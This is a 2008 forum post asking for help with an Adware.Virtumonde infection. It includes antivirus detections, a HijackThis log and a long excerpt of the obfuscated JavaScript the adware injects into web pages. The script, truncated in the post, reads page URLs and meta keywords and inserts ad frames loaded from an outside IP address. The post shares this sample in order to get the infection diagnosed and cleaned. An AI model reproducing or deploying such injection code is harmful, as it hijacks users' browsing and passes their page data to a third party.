Adware.Virtumonde Screwing up my computer


  • This topic is locked
20 replies to this topic

#1 a_fahmy7 (Advanced Member, Full Member, 109 posts)

Posted 13 June 2008 - 03:59 PM

Hello

Yesterday, my computer got infected while downloading a rar file. I got an immediate warning from NOD32 about the file and I chose "terminate process" immediately, then deleted the downloaded rar file. However, the adware managed to install itself anyway. Since then I get occasional alerts from NOD32 that the file bla bla is infected with it.

The first sign, however, that something was wrong was that the Windows auto-update feature got disabled, though it was always On, the default. Now whenever I restart Windows or the computer, I get the alert that the auto-update feature is Off, and each time I have to turn it On again.

The worst symptom, which came today, is that browsing the internet changed. Some sites do not load at all, like Yahoo, and some load slowly, and the adware forces its own code into the web page using JavaScript, making the ads appear on the site pages. Heck, even a flashing ad appears on the SpywareInfo home page... for me only, of course.

Even spywareinfo.com doesn't load. I managed to open this window, as well as browse the internet, only through a proxy, which I am using now while writing this post.

-System Restore displays only one checkpoint, created yesterday, probably immediately after the time of infection. So did the adware do this? Where are all the checkpoints I used to have in June and May?!!?

-NOD32 detected these and supposedly deleted them in the last scan (yet the problem is still there):

C:\Documents and Settings\Ahmed Fahmy\Local Settings\Temporary Internet Files\Content.IE5\X8E5VJRZ\css4[1] - Win32/Adware.Virtumonde application - deleted
C:\System Volume Information\_restore{129201FA-B0AC-49B3-96B2-DEB8B91E727B}\RP458\A0092076.dll - Win32/Adware.Virtumonde application - deleted

-The outcome of HijackThis:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 9:45:54 PM, on 6/13/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\WLTRAY.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\VMSnap3.EXE
C:\WINDOWS\Domino.EXE
C:\WINDOWS\system32\Rundll32.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Digital Line Detect\DLG.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Mozilla Firefox2\firefox.exe
C:\Program Files\Eset\nod32.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Documents and Settings\Ahmed Fahmy\My Documents\My Downloads\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.c...//www.yahoo.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://jobreeze.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.c...//www.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {129FA2A1-408C-4824-83A4-5001581FD01E} - C:\WINDOWS\system32\iifcARIx.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: (no name) - {4817D522-BD26-47F3-9239-D83E82760BBC} - C:\WINDOWS\system32\qoMdabXo.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: (no name) - {6C5546A5-BB26-471D-9043-854AFA0AB66D} - C:\WINDOWS\system32\ljJCSkjg.dll (file missing)
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MI1933~1\Office12\GRA8E1~1.DLL
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [Broadcom Wireless Manager UI] C:\WINDOWS\system32\WLTRAY.exe
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [VMSnap3] C:\WINDOWS\VMSnap3.EXE
O4 - HKLM\..\Run: [Domino] C:\WINDOWS\Domino.EXE
O4 - HKLM\..\Run: [BigDog303] C:\WINDOWS\VM303_STI.EXE VIMICRO USB PC Camera (ZC0301PLH)
O4 - HKLM\..\Run: [BMcfa4d225] Rundll32.exe "C:\WINDOWS\system32\gfvwynfe.dll",s
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Yahoo! Widget Engine.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
O4 - Global Startup: Bluetooth.lnk = ?
O4 - Global Startup: Digital Line Detect.lnk = ?
O8 - Extra context menu item: Download Using &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra button: PalTalk - {4EAFEF58-EEFA-4116-983D-03B49BCBFFFE} - C:\Program Files\Paltalk Messenger\Paltalk.exe (file missing)
O9 - Extra button: Bonjour - {7F9DB11C-E358-4ca6-A83D-ACC663939424} - C:\Program Files\Bonjour\ExplorerPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\Office12\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Ahmed Fahmy\Start Menu\Programs\IMVU\Run IMVU.lnk
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zon...kr.cab56986.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcaf...01/mcinsctl.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zon...1/GAME_UNO1.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zon...ro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zon...nt.cab56907.cab
O16 - DPF: {DA758BB1-5F89-4465-975F-8D7179A4BCF3} (WheelofFortune Object) - http://messenger.zon...oF.cab57176.cab
O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) - http://messenger.zon...er.cab56986.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{BF5CCFB5-6096-404D-B329-56E8F3847FA6}: NameServer = 62.117.40.111,62.117.40.112
O17 - HKLM\System\CCS\Services\Tcpip\..\{CA254E2C-5690-497E-9971-569C6268C2DB}: NameServer = 62.117.40.111,80.75.166.250
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MI1933~1\Office12\GR99D3~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O20 - Winlogon Notify: iifcARIx - C:\WINDOWS\SYSTEM32\iifcARIx.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online, Inc. - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: GoogleDesktopManager - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktopManager.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: mental ray 3.5 Satellite (32-bit) (mi-raysat_3dsmax9_32) - Unknown owner - C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
O23 - Service: MySQL - Unknown owner - C:\Program.exe (file missing)
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: TuneUp WinStyler Theme Service (TUWinStylerThemeSvc) - TuneUp Software GmbH - C:\Program Files\TuneUp Utilities 2006\WinStylerThemeSvc.exe
O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe
O23 - Service: Dell Wireless WLAN Tray Service (wltrysvc) - Unknown owner - C:\WINDOWS\System32\WLTRYSVC.EXE

--
End of file - 13072 bytes


-The JS code that appears on web pages:

<script type="text/javascript" language="javascript">

var NSiMLeWsQpCLapBbww =22131 + 21122;
HxnlCrSmqQmcHEYJgrP = window.onload;
var mwXYIAVRkWuXjJy =32336;
window.
YsOdeVmPohFmACOqQ = 24087;

WJfOmfKONWHtrdsBR = "";

IwAcgVSPRioVLmf = "";
var fclkGxGNoHQhIQbg= 25868 - 6878;
VwPLuTcNsNemJejw = "";


mcyCYsfGWgSYfysplI = QvwYtAhTHqrqPYL(window.location.href);
var svLJhWsihMcSDJtGCLt =22525 + 21929;
SlCGyFQfaXOMnniLK = '154678';
var CYloeErmHYtFVCxtsd;
KJEjXIeLmLOmsngs = '08CE15D3C6514AFEAE39E6D3957E41CC';

oLphEwWGJxDDOUMUJe = '3660139C38E811DDB10B154678CFFFFF';
FtgTYOvIjOcWqqUXh =23729 + 10305;
dTQFgjaPsaeNorlH = 'mm2';




dlrxgvepbYPXtsQ = new Array();
var MCijQDnpyxAElrhV= 11948 - 11232;

KMuAUllXyybHTsoAhR = new Array();


var arrAnti = new Array("vlaze\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b728x90", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b728x90',
'http://85.12.43.83/f...8x90_9.html?a=b'
'728', '728', '90', '90',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b720x300", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b720x300',
'http://85.12.43.83/f...x300_1.html?a=b'
'720', '720', '300', '300',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b468x60", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b468x60',
'http://85.12.43.83/f...x60_15.html?a=b'
'468', '468', '60', '60',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b336x280", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b336x280',
'http://85.12.43.83/f...x280_1.html?a=b'
'336', '336', '280', '280',
'',
''));
var arrAnti = new Array("vlaze\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b300x250", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b300x250',
'http://85.12.43.83/f...x250_3.html?a=b'
'300', '300', '250', '250',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b300x100", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b300x100',
'http://85.12.43.83/f...x100_1.html?a=b'
'300', '300', '100', '100',
'',
''));
var arrAnti = new Array("googlesyndication\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b250x250", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b250x250',
'http://85.12.43.83/f...x250_1.html?a=b'
'250', '250', '250', '250',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b240x400", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b240x400',
'http://85.12.43.83/f...x400_1.html?a=b'
'240', '240', '400', '400',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b234x60", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b234x60',
'http://85.12.43.83/f...4x60_1.html?a=b'
'234', '234', '60', '60',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b180x150", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b180x150',
'http://85.12.43.83/f...x150_1.html?a=b'
'180', '180', '150', '150',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b160x600", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b160x600',
'http://85.12.43.83/f...x600_1.html?a=b'
'160', '160', '600', '600',
'',
''));
var arrAnti = new Array("search42\.com","joybuyjoy\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b125x125", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b125x125',
'http://85.12.43.83/f...x125_1.html?a=b'
'125', '125', '125', '125',
'',
''));
var arrAnti = new Array("tube\.com","youporn\.com","sexthe\.net","games\.yahoo\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x90", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b120x90',
'http://85.12.43.83/f...0x90_1.html?a=b'
'120', '120', '90', '90',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x600", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b120x600',
'http://85.12.43.83/f...x600_1.html?a=b'
'120', '120', '600', '600',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x240", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b120x240',
'http://85.12.43.83/f...x240_1.html?a=b'
'120', '120', '240', '240',
'',
''));



jKfuMEbehmSoDiaq = new Array();
VbcBoPFnvRiqwejyc =14907 + 21847;

cAmNPvvGDrXXVVYKbEF =3687 + 19013;
function hRFdedGVWUeIUmhVUk()
{
var CqgwKfSYcKXxEiMdoy= 31176 - 22385;
var wCgyCcPXTNCOCWxrTm;


window.
var QFwfClgsXtLmnDbas= 8413 - 5684;
if (HxnlCrSmqQmcHEYJgrP != null)
{
HxnlCrSmqQmcHEYJgrP();

}

var OVPcEdAybXkCiMVWRh;
if (!document || !document.body || !document.body.childNodes)
{
return;
var kEXVgtvCTuVohkrVhu= 875 - 22079;
}

if ( document.referrer && document.referrer.indexOf("85.12.43.83") >= 0)
return;

WJfOmfKONWHtrdsBR = sCFYiLEYpNtehya();
var MEvSjTqhmRYqFvIcJO= 4020 - 1840;
IwAcgVSPRioVLmf = HPXtBUDYOsDewuJS();
var HTRtHpBeoncDKDN= 7928 - 26912;
VwPLuTcNsNemJejw = FiuXbUKnHCDceCPUxb(document.body);
BDQHEaCDYwRajoWNtCj =24652 + 29963;

xuTVOuEkxlkDrigChjl();
RyERCYmxYuXdPVFbjma = 12989;
if(aSVAqBJVoqOwbmyck())
{

document.body.style.marginLeft = '0';

var XSUgvcbcULBhXniM =7404;
document.body.style.marginTop = '0';
var BQQcVlgealYPQlNE= 31700 - 10417;
return;
var GCADqJoMoycUcJPLb;
}

eyrjSsekVwfLMHwY = 13026;
wCgyCcPXTNCOCWxrTm = document.body.childNodes;

lHARjOOcARalwFdIBAG(KMuAUllXyybHTsoAhR, wCgyCcPXTNCOCWxrTm, 0);


}

function tkMlVUbqAcSlacRaDXf(millis)
{
GsipQUBcGAjDXXwPW =8260 + 18142;
var date = new Date();
gABItqByMLAdQdldkP = 4760;
var curDate = null;


do {
var LLIflyeUwyEwdDgvVbn =12052 + 29232;
curDate = new Date();

}
while(curDate-date < millis);
}

function sCFYiLEYpNtehya()
{
var WXVwjoYCGgWxrYvoKUq= 431 - 16654;
var temp = "";
var ORaMWDXLXjKkYOiAU= 3986 - 5617;
var e;
GclCyQrpCAfXORwUR = 14740;
try
{

temp = window.top.location.href;
var WUQPniHwrJSYrFTV= 13973 - 1099;
}
catch(e)
{

temp = window.location.href;
jWjfyauggTNkWoLIp =9455 + 18676;
}

return temp;
JNLYLuRppiTVLlBVn =28948 + 8961;

}


function QvwYtAhTHqrqPYL(str)
{
sTlCIfgOatYmeyp =24862 + 1717;
if (str == null)
{
var CYCrGHpSRrxkdlga= 28639 - 24244;
return "";
}

dvJYneOKKUhhVuEyIF =17500 + 29508;
str = escape(str);
var cSFHtkXBhICyHFG =10535 + 7135;
str = str.replace(/\+/g, "%2B");
vjmatTclgGCQYIpr =4479 + 1842;
str = str.replace(/\//g, "%2F");


return str;
YAPVyWhCSICEQnsrE = 22693;
}


function HPXtBUDYOsDewuJS()
{
var OSrIUhRcLXWoEsql =26641 + 32195;
var e;
EjMWJGtjdUmyuXWbiT =2912 + 25891;
var str = "";
qsgcdWaBpJHfFphTH = 26540;
try
{
var VhFCPEylbjsUacGrFQ =25244;
var head = window.top.document.getElementsByTagName('head').item(0);
var rpEMlSFVxMSqCIc= 21727 - 26614;
if(head != null)
{
var BtHUMsDueNmrwDaer= 9712 - 13866;
if (head.childNodes != null && head.childNodes.length > 0)
{
IVWLgYJomTjNXVVSNlP = 834;
for(var y=head.childNodes.length-1; y>=0; y--)
{
var child = head.childNodes.item(y);

if(child.tagName == "META")
{
var KrwdfneyJmqhUrj;
str += "<META ";
var HHQjsbOltDXGHhuxm =21229 + 11202;
if(child.content != "" && child.name == "keywords")
str += 'content="' + child.content + '" ';


str += " >\n";
var QLBDFWOhCBjOYKBBPh =15391;
}
}
}
}
}
catch(e)
{
giPUXpgJmoOYshcA = 12780;
}

UelVNCsDxweaOSXc = 19422;
str = QvwYtAhTHqrqPYL(str);

return str;

}


function fvfLgtJlubACmUbDJF(rulesetElement)
{

var i;
var gPqXUaoxhTiNBYACn= 16686 - 32012;


if (rulesetElement.Global == 1)
{
var VVenmtHnWRUDBaG;
return "_";
}

var CbtseCFwFrGhsYjb =13401 + 16423;

for (i = 0; i < rulesetElement.AntiArr.length; i++)
if (document.location.href.indexOf(rulesetElement.AntiArr[i]) != -1)
{
NvDNHaWebGuOlpwY =8184 + 31603;
return null;

}

var gaeHreOCbKtlGKFKJD= 32711 - 29392;

for (i = 0; i < rulesetElement.ContentArr.length; i++)
{
QOOETbhnnYRgdGTd = 184;
if (VwPLuTcNsNemJejw.indexOf(rulesetElement.ContentArr[i]) != -1)
return rulesetElement.ContentArr[i];
var BXOejyNlgmsUUysIsV =13647 + 232;
}

for (i = 0; i < rulesetElement.MetaArr.length; i++)
{
var GKnvTxbseOCxUhREJ;
if (IwAcgVSPRioVLmf.indexOf(rulesetElement.MetaArr[i]) != -1)
return rulesetElement.MetaArr[i];

}

